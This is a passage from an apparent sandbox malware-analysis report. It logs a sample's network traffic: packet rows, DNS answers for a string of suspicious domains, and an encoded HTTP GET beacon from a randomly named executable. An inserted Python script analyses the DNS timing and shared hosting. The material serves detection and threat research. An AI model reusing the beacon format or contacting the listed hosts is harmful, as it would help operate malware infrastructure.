Oct 9, 2024 14:06:56.792401075 CEST | 49986 | 80 | 192.168.2.7 | 162.0.238.238
Oct 9, 2024 14:06:56.797410965 CEST | 80 | 49986 | 162.0.238.238 | 192.168.2.7
Oct 9, 2024 14:06:56.797478914 CEST | 49986 | 80 | 192.168.2.7 | 162.0.238.238
Oct 9, 2024 14:06:56.812716961 CEST | 49986 | 80 | 192.168.2.7 | 162.0.238.238
Oct 9, 2024 14:06:56.817754030 CEST | 80 | 49986 | 162.0.238.238 | 192.168.2.7
Oct 9, 2024 14:06:57.416392088 CEST | 80 | 49986 | 162.0.238.238 | 192.168.2.7
Oct 9, 2024 14:06:57.416580915 CEST | 80 | 49986 | 162.0.238.238 | 192.168.2.7
Oct 9, 2024 14:06:57.423012972 CEST | 49986 | 80 | 192.168.2.7 | 162.0.238.238
Oct 9, 2024 14:06:57.725179911 CEST | 80 | 49985 | 162.0.238.238 | 192.168.2.7
Oct 9, 2024 14:06:57.729319096 CEST | 49985 | 80 | 192.168.2.7 | 162.0.238.238
Oct 9, 2024 14:06:58.324317932 CEST | 49986 | 80 | 192.168.2.7 | 162.0.238.238
Oct 9, 2024 14:06:59.338267088 CEST | 49987 | 80 | 192.168.2.7 | 162.0.238.238
Oct 9, 2024 14:06:59.343329906 CEST | 80 | 49987 | 162.0.238.238 | 192.168.2.7
Oct 9, 2024 14:06:59.349098921 CEST | 49987 | 80 | 192.168.2.7 | 162.0.238.238
Oct 9, 2024 14:06:59.364028931 CEST | 49987 | 80 | 192.168.2.7 | 162.0.238.238
Oct 9, 2024 14:06:59.369033098 CEST | 80 | 49987 | 162.0.238.238 | 192.168.2.7
Oct 9, 2024 14:06:59.369113922 CEST | 80 | 49987 | 162.0.238.238 | 192.168.2.7
Oct 9, 2024 14:06:59.941700935 CEST | 80 | 49987 | 162.0.238.238 | 192.168.2.7
Oct 9, 2024 14:06:59.941814899 CEST | 80 | 49987 | 162.0.238.238 | 192.168.2.7
Oct 9, 2024 14:06:59.945214033 CEST | 49987 | 80 | 192.168.2.7 | 162.0.238.238
Oct 9, 2024 14:07:00.866574049 CEST | 49987 | 80 | 192.168.2.7 | 162.0.238.238
Oct 9, 2024 14:07:01.885380983 CEST | 49988 | 80 | 192.168.2.7 | 162.0.238.238
Oct 9, 2024 14:07:01.890724897 CEST | 80 | 49988 | 162.0.238.238 | 192.168.2.7
Oct 9, 2024 14:07:01.890887022 CEST | 49988 | 80 | 192.168.2.7 | 162.0.238.238
Oct 9, 2024 14:07:01.898432016 CEST | 49988 | 80 | 192.168.2.7 | 162.0.238.238
Oct 9, 2024 14:07:01.904081106 CEST | 80 | 49988 | 162.0.238.238 | 192.168.2.7
Oct 9, 2024 14:07:02.483592987 CEST | 80 | 49988 | 162.0.238.238 | 192.168.2.7
Oct 9, 2024 14:07:02.484200954 CEST | 80 | 49988 | 162.0.238.238 | 192.168.2.7
Oct 9, 2024 14:07:02.484241009 CEST | 49988 | 80 | 192.168.2.7 | 162.0.238.238
Oct 9, 2024 14:07:02.488167048 CEST | 49988 | 80 | 192.168.2.7 | 162.0.238.238
Oct 9, 2024 14:07:02.493061066 CEST | 80 | 49988 | 162.0.238.238 | 192.168.2.7
Oct 9, 2024 14:07:16.117257118 CEST | 49989 | 80 | 192.168.2.7 | 3.33.130.190
Oct 9, 2024 14:07:16.123359919 CEST | 80 | 49989 | 3.33.130.190 | 192.168.2.7
Oct 9, 2024 14:07:16.125006914 CEST | 49989 | 80 | 192.168.2.7 | 3.33.130.190
Oct 9, 2024 14:07:16.135421038 CEST | 49989 | 80 | 192.168.2.7 | 3.33.130.190
Oct 9, 2024 14:07:16.140269995 CEST | 80 | 49989 | 3.33.130.190 | 192.168.2.7
Oct 9, 2024 14:07:16.600474119 CEST | 80 | 49989 | 3.33.130.190 | 192.168.2.7
Oct 9, 2024 14:07:16.600701094 CEST | 49989 | 80 | 192.168.2.7 | 3.33.130.190
Oct 9, 2024 14:07:17.647903919 CEST | 49989 | 80 | 192.168.2.7 | 3.33.130.190
Oct 9, 2024 14:07:17.652813911 CEST | 80 | 49989 | 3.33.130.190 | 192.168.2.7
Oct 9, 2024 14:07:18.667392969 CEST | 49990 | 80 | 192.168.2.7 | 3.33.130.190
Oct 9, 2024 14:07:18.672504902 CEST | 80 | 49990 | 3.33.130.190 | 192.168.2.7
Oct 9, 2024 14:07:18.680056095 CEST | 49990 | 80 | 192.168.2.7 | 3.33.130.190
Oct 9, 2024 14:07:18.697254896 CEST | 49990 | 80 | 192.168.2.7 | 3.33.130.190
Oct 9, 2024 14:07:18.702245951 CEST | 80 | 49990 | 3.33.130.190 | 192.168.2.7
Oct 9, 2024 14:07:20.094716072 CEST | 80 | 49990 | 3.33.130.190 | 192.168.2.7
Oct 9, 2024 14:07:20.094841957 CEST | 49990 | 80 | 192.168.2.7 | 3.33.130.190
Oct 9, 2024 14:07:20.210396051 CEST | 49990 | 80 | 192.168.2.7 | 3.33.130.190
Oct 9, 2024 14:07:20.522886038 CEST | 49990 | 80 | 192.168.2.7 | 3.33.130.190
Oct 9, 2024 14:07:20.593427896 CEST | 80 | 49990 | 3.33.130.190 | 192.168.2.7
Oct 9, 2024 14:07:20.593442917 CEST | 80 | 49990 | 3.33.130.190 | 192.168.2.7
Oct 9, 2024 14:07:20.597163916 CEST | 49990 | 80 | 192.168.2.7 | 3.33.130.190
                                                                                                                Oct 9, 2024 14:07:21.229639053 CEST4999180192.168.2.73.33.130.190
                                                                                                                Oct 9, 2024 14:07:21.234563112 CEST80499913.33.130.190192.168.2.7
                                                                                                                Oct 9, 2024 14:07:21.237176895 CEST4999180192.168.2.73.33.130.190
                                                                                                                Oct 9, 2024 14:07:21.247864008 CEST4999180192.168.2.73.33.130.190
                                                                                                                Oct 9, 2024 14:07:21.252845049 CEST80499913.33.130.190192.168.2.7
                                                                                                                Oct 9, 2024 14:07:21.253038883 CEST80499913.33.130.190192.168.2.7
                                                                                                                Oct 9, 2024 14:07:21.740712881 CEST80499913.33.130.190192.168.2.7
                                                                                                                Oct 9, 2024 14:07:21.740813971 CEST4999180192.168.2.73.33.130.190
                                                                                                                Oct 9, 2024 14:07:22.761038065 CEST4999180192.168.2.73.33.130.190
                                                                                                                Oct 9, 2024 14:07:22.766493082 CEST80499913.33.130.190192.168.2.7
                                                                                                                Oct 9, 2024 14:07:23.777386904 CEST4999280192.168.2.73.33.130.190
                                                                                                                Oct 9, 2024 14:07:23.782289028 CEST80499923.33.130.190192.168.2.7
                                                                                                                Oct 9, 2024 14:07:23.782366991 CEST4999280192.168.2.73.33.130.190
                                                                                                                Oct 9, 2024 14:07:23.793776035 CEST4999280192.168.2.73.33.130.190
                                                                                                                Oct 9, 2024 14:07:23.798659086 CEST80499923.33.130.190192.168.2.7
                                                                                                                Oct 9, 2024 14:07:24.238322973 CEST80499923.33.130.190192.168.2.7
                                                                                                                Oct 9, 2024 14:07:24.238609076 CEST80499923.33.130.190192.168.2.7
                                                                                                                Oct 9, 2024 14:07:24.238662004 CEST4999280192.168.2.73.33.130.190
                                                                                                                Oct 9, 2024 14:07:24.241573095 CEST4999280192.168.2.73.33.130.190
                                                                                                                Oct 9, 2024 14:07:24.246922970 CEST80499923.33.130.190192.168.2.7
                                                                                                                Oct 9, 2024 14:07:37.465291023 CEST4999380192.168.2.776.223.67.189
                                                                                                                Oct 9, 2024 14:07:37.472240925 CEST804999376.223.67.189192.168.2.7
                                                                                                                Oct 9, 2024 14:07:37.472313881 CEST4999380192.168.2.776.223.67.189
                                                                                                                Oct 9, 2024 14:07:37.486776114 CEST4999380192.168.2.776.223.67.189
                                                                                                                Oct 9, 2024 14:07:37.491813898 CEST804999376.223.67.189192.168.2.7
                                                                                                                Oct 9, 2024 14:07:37.937000036 CEST804999376.223.67.189192.168.2.7
                                                                                                                Oct 9, 2024 14:07:37.937098026 CEST4999380192.168.2.776.223.67.189
                                                                                                                Oct 9, 2024 14:07:38.991756916 CEST4999380192.168.2.776.223.67.189
                                                                                                                Oct 9, 2024 14:07:38.996614933 CEST804999376.223.67.189192.168.2.7
                                                                                                                Oct 9, 2024 14:07:40.011662006 CEST4999480192.168.2.776.223.67.189
                                                                                                                Oct 9, 2024 14:07:40.016752958 CEST804999476.223.67.189192.168.2.7
                                                                                                                Oct 9, 2024 14:07:40.016827106 CEST4999480192.168.2.776.223.67.189
                                                                                                                Oct 9, 2024 14:07:40.030057907 CEST4999480192.168.2.776.223.67.189
                                                                                                                Oct 9, 2024 14:07:40.035037994 CEST804999476.223.67.189192.168.2.7
                                                                                                                Oct 9, 2024 14:07:40.476202011 CEST804999476.223.67.189192.168.2.7
                                                                                                                Oct 9, 2024 14:07:40.477190018 CEST4999480192.168.2.776.223.67.189
                                                                                                                Oct 9, 2024 14:07:41.538598061 CEST4999480192.168.2.776.223.67.189
                                                                                                                Oct 9, 2024 14:07:41.543947935 CEST804999476.223.67.189192.168.2.7
                                                                                                                Oct 9, 2024 14:07:42.557914972 CEST4999580192.168.2.776.223.67.189
                                                                                                                Oct 9, 2024 14:07:42.562845945 CEST804999576.223.67.189192.168.2.7
                                                                                                                Oct 9, 2024 14:07:42.565176010 CEST4999580192.168.2.776.223.67.189
                                                                                                                Oct 9, 2024 14:07:42.577312946 CEST4999580192.168.2.776.223.67.189
                                                                                                                Oct 9, 2024 14:07:42.583373070 CEST804999576.223.67.189192.168.2.7
                                                                                                                Oct 9, 2024 14:07:42.585258007 CEST804999576.223.67.189192.168.2.7
                                                                                                                Oct 9, 2024 14:07:43.024250031 CEST804999576.223.67.189192.168.2.7
                                                                                                                Oct 9, 2024 14:07:43.025190115 CEST4999580192.168.2.776.223.67.189
                                                                                                                Oct 9, 2024 14:07:44.085632086 CEST4999580192.168.2.776.223.67.189
                                                                                                                Oct 9, 2024 14:07:44.090444088 CEST804999576.223.67.189192.168.2.7
                                                                                                                Oct 9, 2024 14:07:45.104768991 CEST4999680192.168.2.776.223.67.189
                                                                                                                Oct 9, 2024 14:07:45.110191107 CEST804999676.223.67.189192.168.2.7
                                                                                                                Oct 9, 2024 14:07:45.110275984 CEST4999680192.168.2.776.223.67.189
                                                                                                                Oct 9, 2024 14:07:45.118097067 CEST4999680192.168.2.776.223.67.189
                                                                                                                Oct 9, 2024 14:07:45.123696089 CEST804999676.223.67.189192.168.2.7
                                                                                                                Oct 9, 2024 14:07:45.587131023 CEST804999676.223.67.189192.168.2.7
                                                                                                                Oct 9, 2024 14:07:45.587745905 CEST804999676.223.67.189192.168.2.7
                                                                                                                Oct 9, 2024 14:07:45.587800026 CEST4999680192.168.2.776.223.67.189
                                                                                                                Oct 9, 2024 14:07:45.590406895 CEST4999680192.168.2.776.223.67.189
                                                                                                                Oct 9, 2024 14:07:45.595406055 CEST804999676.223.67.189192.168.2.7
                                                                                                                Oct 9, 2024 14:07:50.703965902 CEST4999780192.168.2.723.227.38.74
                                                                                                                Oct 9, 2024 14:07:50.708828926 CEST804999723.227.38.74192.168.2.7
                                                                                                                Oct 9, 2024 14:07:50.708904028 CEST4999780192.168.2.723.227.38.74
                                                                                                                Oct 9, 2024 14:07:50.720276117 CEST4999780192.168.2.723.227.38.74
                                                                                                                Oct 9, 2024 14:07:50.725204945 CEST804999723.227.38.74192.168.2.7
                                                                                                                Oct 9, 2024 14:07:51.686175108 CEST804999723.227.38.74192.168.2.7
                                                                                                                Oct 9, 2024 14:07:51.686234951 CEST804999723.227.38.74192.168.2.7
                                                                                                                Oct 9, 2024 14:07:51.686248064 CEST804999723.227.38.74192.168.2.7
                                                                                                                Oct 9, 2024 14:07:51.686259985 CEST804999723.227.38.74192.168.2.7
                                                                                                                Oct 9, 2024 14:07:51.686283112 CEST4999780192.168.2.723.227.38.74
                                                                                                                Oct 9, 2024 14:07:51.686307907 CEST4999780192.168.2.723.227.38.74
                                                                                                                Oct 9, 2024 14:07:51.686460972 CEST804999723.227.38.74192.168.2.7
                                                                                                                Oct 9, 2024 14:07:51.686490059 CEST804999723.227.38.74192.168.2.7
                                                                                                                Oct 9, 2024 14:07:51.686517000 CEST4999780192.168.2.723.227.38.74
                                                                                                                Oct 9, 2024 14:07:51.686532974 CEST4999780192.168.2.723.227.38.74
                                                                                                                Oct 9, 2024 14:07:52.226169109 CEST4999780192.168.2.723.227.38.74
                                                                                                                Oct 9, 2024 14:07:53.281876087 CEST4999880192.168.2.723.227.38.74
                                                                                                                Oct 9, 2024 14:07:53.287085056 CEST804999823.227.38.74192.168.2.7
                                                                                                                Oct 9, 2024 14:07:53.287240028 CEST4999880192.168.2.723.227.38.74
                                                                                                                Oct 9, 2024 14:07:53.343225956 CEST4999880192.168.2.723.227.38.74
                                                                                                                Oct 9, 2024 14:07:53.348118067 CEST804999823.227.38.74192.168.2.7
                                                                                                                Oct 9, 2024 14:07:54.257119894 CEST804999823.227.38.74192.168.2.7
                                                                                                                Oct 9, 2024 14:07:54.257144928 CEST804999823.227.38.74192.168.2.7
                                                                                                                Oct 9, 2024 14:07:54.257155895 CEST804999823.227.38.74192.168.2.7
                                                                                                                Oct 9, 2024 14:07:54.257168055 CEST804999823.227.38.74192.168.2.7
                                                                                                                Oct 9, 2024 14:07:54.257199049 CEST4999880192.168.2.723.227.38.74
                                                                                                                Oct 9, 2024 14:07:54.257236004 CEST4999880192.168.2.723.227.38.74
                                                                                                                Oct 9, 2024 14:07:54.257767916 CEST804999823.227.38.74192.168.2.7
                                                                                                                Oct 9, 2024 14:07:54.257816076 CEST4999880192.168.2.723.227.38.74
                                                                                                                Oct 9, 2024 14:07:54.867170095 CEST4999880192.168.2.723.227.38.74
                                                                                                                Oct 9, 2024 14:07:55.887223005 CEST4999980192.168.2.723.227.38.74
                                                                                                                Oct 9, 2024 14:07:55.892343998 CEST804999923.227.38.74192.168.2.7
                                                                                                                Oct 9, 2024 14:07:55.892431021 CEST4999980192.168.2.723.227.38.74
                                                                                                                Oct 9, 2024 14:07:55.908375978 CEST4999980192.168.2.723.227.38.74
                                                                                                                Oct 9, 2024 14:07:55.913332939 CEST804999923.227.38.74192.168.2.7
                                                                                                                Oct 9, 2024 14:07:55.913414001 CEST804999923.227.38.74192.168.2.7
                                                                                                                Oct 9, 2024 14:07:56.496354103 CEST804999923.227.38.74192.168.2.7
                                                                                                                Oct 9, 2024 14:07:56.496368885 CEST804999923.227.38.74192.168.2.7
                                                                                                                Oct 9, 2024 14:07:56.496551037 CEST4999980192.168.2.723.227.38.74
                                                                                                                Oct 9, 2024 14:07:56.496901035 CEST804999923.227.38.74192.168.2.7
                                                                                                                Oct 9, 2024 14:07:56.496913910 CEST804999923.227.38.74192.168.2.7
                                                                                                                Oct 9, 2024 14:07:56.496925116 CEST804999923.227.38.74192.168.2.7
                                                                                                                Oct 9, 2024 14:07:56.497132063 CEST804999923.227.38.74192.168.2.7
                                                                                                                Oct 9, 2024 14:07:56.497155905 CEST4999980192.168.2.723.227.38.74
                                                                                                                Oct 9, 2024 14:07:56.505081892 CEST4999980192.168.2.723.227.38.74
                                                                                                                Oct 9, 2024 14:07:57.413997889 CEST4999980192.168.2.723.227.38.74
                                                                                                                Oct 9, 2024 14:07:58.433437109 CEST5000080192.168.2.723.227.38.74
                                                                                                                Oct 9, 2024 14:07:58.438751936 CEST805000023.227.38.74192.168.2.7
                                                                                                                Oct 9, 2024 14:07:58.438837051 CEST5000080192.168.2.723.227.38.74
                                                                                                                Oct 9, 2024 14:07:58.448271036 CEST5000080192.168.2.723.227.38.74
                                                                                                                Oct 9, 2024 14:07:58.453269005 CEST805000023.227.38.74192.168.2.7
                                                                                                                Oct 9, 2024 14:07:58.956057072 CEST805000023.227.38.74192.168.2.7
                                                                                                                Oct 9, 2024 14:07:58.956235886 CEST805000023.227.38.74192.168.2.7
                                                                                                                Oct 9, 2024 14:07:58.956350088 CEST5000080192.168.2.723.227.38.74
                                                                                                                Oct 9, 2024 14:07:58.956799984 CEST805000023.227.38.74192.168.2.7
                                                                                                                Oct 9, 2024 14:07:58.956896067 CEST5000080192.168.2.723.227.38.74
                                                                                                                Oct 9, 2024 14:07:58.959976912 CEST5000080192.168.2.723.227.38.74
                                                                                                                Oct 9, 2024 14:07:58.966248035 CEST805000023.227.38.74192.168.2.7
                                                                                                                Oct 9, 2024 14:08:04.072772026 CEST5000180192.168.2.7199.59.243.227
                                                                                                                Oct 9, 2024 14:08:04.077712059 CEST8050001199.59.243.227192.168.2.7
                                                                                                                Oct 9, 2024 14:08:04.077789068 CEST5000180192.168.2.7199.59.243.227
                                                                                                                Oct 9, 2024 14:08:04.100651979 CEST5000180192.168.2.7199.59.243.227
                                                                                                                Oct 9, 2024 14:08:04.105803967 CEST8050001199.59.243.227192.168.2.7
                                                                                                                Oct 9, 2024 14:08:04.533595085 CEST8050001199.59.243.227192.168.2.7
                                                                                                                Oct 9, 2024 14:08:04.533689976 CEST8050001199.59.243.227192.168.2.7
                                                                                                                Oct 9, 2024 14:08:04.533701897 CEST8050001199.59.243.227192.168.2.7
                                                                                                                Oct 9, 2024 14:08:04.534290075 CEST5000180192.168.2.7199.59.243.227
                                                                                                                Oct 9, 2024 14:08:05.616854906 CEST5000180192.168.2.7199.59.243.227
                                                                                                                Oct 9, 2024 14:08:06.635871887 CEST5000280192.168.2.7199.59.243.227
                                                                                                                Oct 9, 2024 14:08:06.640829086 CEST8050002199.59.243.227192.168.2.7
                                                                                                                Oct 9, 2024 14:08:06.641186953 CEST5000280192.168.2.7199.59.243.227
                                                                                                                Oct 9, 2024 14:08:06.653103113 CEST5000280192.168.2.7199.59.243.227
                                                                                                                Oct 9, 2024 14:08:06.657983065 CEST8050002199.59.243.227192.168.2.7
                                                                                                                Oct 9, 2024 14:08:07.116070986 CEST8050002199.59.243.227192.168.2.7
                                                                                                                Oct 9, 2024 14:08:07.116379023 CEST8050002199.59.243.227192.168.2.7
                                                                                                                Oct 9, 2024 14:08:07.116391897 CEST8050002199.59.243.227192.168.2.7
                                                                                                                Oct 9, 2024 14:08:07.116528988 CEST5000280192.168.2.7199.59.243.227
                                                                                                                Oct 9, 2024 14:08:08.230542898 CEST5000280192.168.2.7199.59.243.227
                                                                                                                Oct 9, 2024 14:08:09.252197027 CEST5000380192.168.2.7199.59.243.227
                                                                                                                Oct 9, 2024 14:08:09.257164955 CEST8050003199.59.243.227192.168.2.7
                                                                                                                Oct 9, 2024 14:08:09.259509087 CEST5000380192.168.2.7199.59.243.227
                                                                                                                Oct 9, 2024 14:08:09.274578094 CEST5000380192.168.2.7199.59.243.227
                                                                                                                Oct 9, 2024 14:08:09.279474020 CEST8050003199.59.243.227192.168.2.7
                                                                                                                Oct 9, 2024 14:08:09.279588938 CEST8050003199.59.243.227192.168.2.7
                                                                                                                Oct 9, 2024 14:08:09.719027042 CEST8050003199.59.243.227192.168.2.7
                                                                                                                Oct 9, 2024 14:08:09.719434977 CEST8050003199.59.243.227192.168.2.7
                                                                                                                Oct 9, 2024 14:08:09.719444990 CEST8050003199.59.243.227192.168.2.7
                                                                                                                Oct 9, 2024 14:08:09.719485044 CEST5000380192.168.2.7199.59.243.227
                                                                                                                Oct 9, 2024 14:08:10.788743973 CEST5000380192.168.2.7199.59.243.227
                                                                                                                Oct 9, 2024 14:08:11.853629112 CEST5000480192.168.2.7199.59.243.227
                                                                                                                Oct 9, 2024 14:08:11.858530998 CEST8050004199.59.243.227192.168.2.7
                                                                                                                Oct 9, 2024 14:08:11.858613968 CEST5000480192.168.2.7199.59.243.227
                                                                                                                Oct 9, 2024 14:08:12.033199072 CEST5000480192.168.2.7199.59.243.227
                                                                                                                Oct 9, 2024 14:08:12.038738012 CEST8050004199.59.243.227192.168.2.7
                                                                                                                Oct 9, 2024 14:08:12.357306957 CEST8050004199.59.243.227192.168.2.7
                                                                                                                Oct 9, 2024 14:08:12.357325077 CEST8050004199.59.243.227192.168.2.7
                                                                                                                Oct 9, 2024 14:08:12.357467890 CEST5000480192.168.2.7199.59.243.227
                                                                                                                Oct 9, 2024 14:08:12.357639074 CEST8050004199.59.243.227192.168.2.7
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                                                                                Oct 9, 2024 14:08:25.705859900 CEST1.1.1.1192.168.2.70x1c7dNo error (0)consultarfacil.online3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                Oct 9, 2024 14:08:25.705859900 CEST1.1.1.1192.168.2.70x1c7dNo error (0)consultarfacil.online15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                Oct 9, 2024 14:08:39.053755045 CEST1.1.1.1192.168.2.70x5922No error (0)www.40wxd.top40wxd.topCNAME (Canonical name)IN (0x0001)false
                                                                                                                Oct 9, 2024 14:08:39.053755045 CEST1.1.1.1192.168.2.70x5922No error (0)40wxd.top206.119.82.134A (IP address)IN (0x0001)false
                                                                                                                Oct 9, 2024 14:08:53.026911974 CEST1.1.1.1192.168.2.70xa912No error (0)www.allthingsjasmin.comallthingsjasmin.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                Oct 9, 2024 14:08:53.026911974 CEST1.1.1.1192.168.2.70xa912No error (0)allthingsjasmin.com3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                Oct 9, 2024 14:08:53.026911974 CEST1.1.1.1192.168.2.70xa912No error (0)allthingsjasmin.com15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                Oct 9, 2024 14:09:07.668690920 CEST1.1.1.1192.168.2.70x3f66No error (0)www.ophthalmo.cloud217.160.0.207A (IP address)IN (0x0001)false
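
The lookups in the table arrive one host at a time, roughly eight to twenty seconds apart, three of them fail (NXDOMAIN or SERVFAIL), and four different hostnames (www.myjiorooms.services, www.dto20.shop, www.consultarfacil.online, www.allthingsjasmin.com) end at the same pair of addresses, 3.33.130.190 and 15.197.148.33. The script below is an added example and is not part of the Joe Sandbox report: it re-parses the rows above into DNS transactions, measures the gap between successive lookups, lists the names that did not resolve, and groups the queried names by the address they resolved to, so the shared-hosting pivot falls out of the report mechanically. The semicolon layout of DNS_ROWS and the function names are this example's own choices.

```python
"""Cadence and shared-address analysis over the DNS answers captured above.

Added example, not part of the Joe Sandbox report. DNS_ROWS copies the Timestamp,
Trans.ID, Reply Code, Name, CName and Address columns of the report's table; the
semicolon layout and the function names are this script's own.
"""
from collections import defaultdict
from datetime import datetime

DNS_ROWS = """\
Oct 9, 2024 14:06:33.945178986 CEST;0x7990;No error (0);www.myjiorooms.services;myjiorooms.services;
Oct 9, 2024 14:06:33.945178986 CEST;0x7990;No error (0);myjiorooms.services;;3.33.130.190
Oct 9, 2024 14:06:33.945178986 CEST;0x7990;No error (0);myjiorooms.services;;15.197.148.33
Oct 9, 2024 14:06:54.233349085 CEST;0x10b8;No error (0);www.mecateg.xyz;;162.0.238.238
Oct 9, 2024 14:07:07.508327007 CEST;0x40aa;Name error (3);www.monos.media;none;none
Oct 9, 2024 14:07:16.114670038 CEST;0x8dde;No error (0);www.dto20.shop;dto20.shop;
Oct 9, 2024 14:07:16.114670038 CEST;0x8dde;No error (0);dto20.shop;;3.33.130.190
Oct 9, 2024 14:07:16.114670038 CEST;0x8dde;No error (0);dto20.shop;;15.197.148.33
Oct 9, 2024 14:07:29.273308039 CEST;0x416e;Name error (3);www.i16zb920d.cfd;none;none
Oct 9, 2024 14:07:37.462120056 CEST;0x5776;No error (0);www.hampelsmagic.life;hampelsmagic.life;
Oct 9, 2024 14:07:37.462120056 CEST;0x5776;No error (0);hampelsmagic.life;;76.223.67.189
Oct 9, 2024 14:07:37.462120056 CEST;0x5776;No error (0);hampelsmagic.life;;13.248.213.45
Oct 9, 2024 14:07:50.701448917 CEST;0x3348;No error (0);www.zingara.life;shops.myshopify.com;
Oct 9, 2024 14:07:50.701448917 CEST;0x3348;No error (0);shops.myshopify.com;;23.227.38.74
Oct 9, 2024 14:08:04.068960905 CEST;0x9071;No error (0);www.polarmuseum.info;;199.59.243.227
Oct 9, 2024 14:08:17.614569902 CEST;0x3b7c;Server failure (2);www.trafegomagico.shop;none;none
Oct 9, 2024 14:08:25.705859900 CEST;0x1c7d;No error (0);www.consultarfacil.online;consultarfacil.online;
Oct 9, 2024 14:08:25.705859900 CEST;0x1c7d;No error (0);consultarfacil.online;;3.33.130.190
Oct 9, 2024 14:08:25.705859900 CEST;0x1c7d;No error (0);consultarfacil.online;;15.197.148.33
Oct 9, 2024 14:08:39.053755045 CEST;0x5922;No error (0);www.40wxd.top;40wxd.top;
Oct 9, 2024 14:08:39.053755045 CEST;0x5922;No error (0);40wxd.top;;206.119.82.134
Oct 9, 2024 14:08:53.026911974 CEST;0xa912;No error (0);www.allthingsjasmin.com;allthingsjasmin.com;
Oct 9, 2024 14:08:53.026911974 CEST;0xa912;No error (0);allthingsjasmin.com;;3.33.130.190
Oct 9, 2024 14:08:53.026911974 CEST;0xa912;No error (0);allthingsjasmin.com;;15.197.148.33
Oct 9, 2024 14:09:07.668690920 CEST;0x3f66;No error (0);www.ophthalmo.cloud;;217.160.0.207
"""


def parse_timestamp(text):
    """'Oct 9, 2024 14:06:33.945178986 CEST' -> datetime. The report prints nanoseconds and
    datetime only takes microseconds, so the last three digits and the zone are dropped."""
    date, clock, _zone = text.rsplit(" ", 2)
    return datetime.strptime(f"{date} {clock[:-3]}", "%b %d, %Y %H:%M:%S.%f")


def parse_rows(text=DNS_ROWS):
    """One dict per answer row; empty or 'none' CName/Address cells become None."""
    rows = []
    for line in text.splitlines():
        ts, txid, rcode, name, cname, address = line.split(";")
        rows.append({"time": parse_timestamp(ts), "txid": txid, "rcode": rcode, "name": name,
                     "cname": cname if cname not in ("", "none") else None,
                     "address": address if address not in ("", "none") else None})
    return rows


def transactions(rows):
    """Collapse answer rows into one record per transaction ID, in time order. The first row
    of a transaction carries the name that was queried; later rows follow the CNAME chain."""
    by_id = {}
    for row in rows:
        tx = by_id.setdefault(row["txid"], {"time": row["time"], "query": row["name"],
                                            "rcode": row["rcode"], "addresses": set()})
        if row["address"]:
            tx["addresses"].add(row["address"])
    return sorted(by_id.values(), key=lambda tx: tx["time"])


def query_intervals(txs):
    """Seconds between successive lookups, i.e. how quickly the sample moves to the next host."""
    return [(b["time"] - a["time"]).total_seconds() for a, b in zip(txs, txs[1:])]


def failed_lookups(txs):
    """Queried names whose reply code was anything other than 'No error'."""
    return [tx["query"] for tx in txs if not tx["rcode"].startswith("No error")]


def shared_addresses(txs, min_names=2):
    """Addresses reached by at least min_names different queried hostnames: a pivot for
    spotting domains that sit on the same hosting."""
    names = defaultdict(set)
    for tx in txs:
        for addr in tx["addresses"]:
            names[addr].add(tx["query"])
    return {addr: sorted(n) for addr, n in names.items() if len(n) >= min_names}


if __name__ == "__main__":
    txs = transactions(parse_rows())
    print(f"{len(txs)} lookups; gaps in seconds: {[round(g, 1) for g in query_intervals(txs)]}")
    print("failed:", failed_lookups(txs))
    for addr, hosts in shared_addresses(txs).items():
        print(addr, "<-", ", ".join(hosts))
```

Feeding it the full table, rather than only the rows a reader happens to notice, is the point: the two shared addresses and the three failed names come out without eyeballing, and the interval list is what you would compare against a longer capture when deciding whether the spacing is regular enough to alert on.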
                                                                                                                • www.bluegirls.blog
                                                                                                                • www.firstcry.shop
                                                                                                                • www.cc101.pro
                                                                                                                • www.myjiorooms.services
                                                                                                                • www.mecateg.xyz
                                                                                                                • www.dto20.shop
                                                                                                                • www.hampelsmagic.life
                                                                                                                • www.zingara.life
                                                                                                                • www.polarmuseum.info
                                                                                                                • www.consultarfacil.online
                                                                                                                • www.40wxd.top
                                                                                                                • www.allthingsjasmin.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49869 | 195.110.124.133 | 80 | 1104 | C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 14:05:50.575087070 CEST | 417 | OUT | GET /ptae/?ZZY=w3WU5oZhC+LnKx26kaNk+YWYu6qqBKD6PC4MUwZYu/Z6/i99bgGsvL6SKkltDKfqu2CGNTh4TErFYwL/tEu+bdChCdZ/afdxeSWGORoCU6iTOQ97Sy+G7WrM0B37ODseprTGeRopW7u8&mHm0o=rrqhoH HTTP/1.1
                                                                                                                Host: www.bluegirls.blog
                                                                                                                Accept: */*
                                                                                                                Accept-Language: en-US,en
                                                                                                                Connection: close
                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
Oct 9, 2024 14:05:51.247927904 CEST | 367 | IN | HTTP/1.1 404 Not Found
                                                                                                                Date: Wed, 09 Oct 2024 12:05:51 GMT
                                                                                                                Server: Apache
                                                                                                                Content-Length: 203
                                                                                                                Connection: close
                                                                                                                Content-Type: text/html; charset=iso-8859-1
